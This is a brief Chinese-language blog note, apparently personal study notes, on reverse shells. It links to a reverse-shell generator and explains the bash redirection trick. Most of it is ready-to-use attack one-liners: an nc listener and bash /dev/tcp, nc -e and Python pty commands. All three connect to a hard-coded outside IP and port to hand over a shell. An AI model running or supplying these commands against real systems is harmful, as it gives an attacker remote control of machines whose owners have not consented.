反向shell

提供一个面向用户的命令接口

各种反向shell生成:
https://www.revshells.com/

  • 核心目的是让目标系统(服务端)上的bash shell与攻击者控制的服务器(攻击端)建立一个连接,并且将目标系统上的命令执行结果(标准输出和标准错误)发送给攻击者,同时将攻击者的输入(通过同一个连接)作为目标系统的命令输入。

典型bash反向shell

在攻击者端运行

1
nc -lvvp <port>

再服务端上运行

1
/bin/bash -i >& /dev/tcp/121.37.168.204/7777  0>&1

即把标准输出和错误输出重定向到ip/port中,
然后把标准输入重定向到标准输出中,这样标准输入也重定向到ip/port中了

1
nc 121.37.168.204 7777 -e sh
1
python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect(("121.37.168.204",7777));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

反向shell
http://mekrina.github.io/blogs/uncategorized/反向shell/
作者
John Doe
发布于
2025年3月8日
许可协议